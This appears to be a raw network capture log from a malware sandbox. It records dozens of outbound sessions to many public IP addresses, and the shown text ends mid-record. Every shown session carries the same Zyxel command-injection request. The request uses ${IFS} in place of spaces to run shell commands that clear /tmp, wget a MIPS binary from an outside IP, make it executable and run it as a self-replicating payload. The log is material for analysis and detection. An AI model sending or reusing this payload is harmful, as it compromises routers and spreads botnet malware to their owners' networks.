                                                Jan 29, 2024 07:08:07.733719110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9330192.168.2.2334688102.39.207.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.733747959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9331192.168.2.2336596222.209.18.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.733804941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9332192.168.2.233883244.37.128.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.733839035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9333192.168.2.233774687.114.42.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.733872890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9334192.168.2.234741478.210.54.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.733906031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9335192.168.2.2344044192.121.248.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.733927965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9336192.168.2.2343188194.61.166.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.733969927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9337192.168.2.2351260185.164.91.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.734005928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9338192.168.2.233726019.77.253.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.745126963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9339192.168.2.2332922220.62.63.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.745177984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9340192.168.2.2347138120.23.61.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.745199919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9341192.168.2.2360338202.254.127.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.745245934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9342192.168.2.2334292143.30.9.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.745296955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9343192.168.2.234075669.88.170.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.745307922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9344192.168.2.233645085.165.158.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.745347977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9345192.168.2.235971636.217.178.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.745392084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9346192.168.2.2346080209.250.197.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.745465994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9347192.168.2.2352164220.34.86.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.745465994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9348192.168.2.2336898187.32.148.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.745527029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9349192.168.2.235857232.134.136.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.745551109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9350192.168.2.2344664199.77.76.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.745584011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9351192.168.2.233484678.98.172.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.745625019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9352192.168.2.2357030105.96.8.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.745647907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9353192.168.2.2357548111.217.119.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.745692015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9354192.168.2.2354966128.135.52.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.745743036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9355192.168.2.2360250109.81.179.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.745783091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9356192.168.2.234683443.241.128.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.745815039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9357192.168.2.233345889.26.61.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.745861053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9358192.168.2.2344166107.80.245.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.745913029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9359192.168.2.2338600134.15.65.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.745934963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9360192.168.2.233378045.152.91.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.745981932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9361192.168.2.234946079.223.202.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.746006966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9362192.168.2.235999040.94.245.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.746028900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9363192.168.2.236061836.86.175.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.746082067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9364192.168.2.233293482.80.33.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.746118069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9365192.168.2.2341346128.134.166.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.746169090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9366192.168.2.235625291.3.153.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.746223927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9367192.168.2.2359804176.81.82.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.746270895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9368192.168.2.2357368112.138.213.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.746294975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9369192.168.2.2334988196.45.139.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.746335030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9370192.168.2.235336870.248.66.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.746370077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9371192.168.2.2352948211.193.131.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.746401072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9372192.168.2.2345230130.24.43.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.746457100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9373192.168.2.2332898112.254.56.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.746493101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9374192.168.2.235615680.157.38.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.746526957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9375192.168.2.233711678.248.168.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.746571064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9376192.168.2.234002245.196.228.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.746612072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9377192.168.2.233674423.192.229.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.746651888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9378192.168.2.2333832212.67.50.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.746681929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9379192.168.2.2336988168.69.32.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.746732950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9380192.168.2.234801677.239.6.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.746761084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9381192.168.2.234610619.7.96.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.746822119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9382192.168.2.2349790118.114.239.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.746879101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9383192.168.2.2334904180.187.43.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.746918917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9384192.168.2.2359756191.19.133.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.746965885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9385192.168.2.234039462.138.44.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.747004986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9386192.168.2.2342918210.176.248.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.747039080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9387192.168.2.235145497.31.190.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.747062922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9388192.168.2.2352170204.238.52.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.747097969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9389192.168.2.235507619.237.209.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.747158051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9390192.168.2.234816423.11.34.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.747215986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9391192.168.2.2344546147.165.144.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.747247934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9392192.168.2.2356076138.70.222.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.747314930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9393192.168.2.2339874132.9.152.37443
                                                TimestampBytes transferredDirectionData
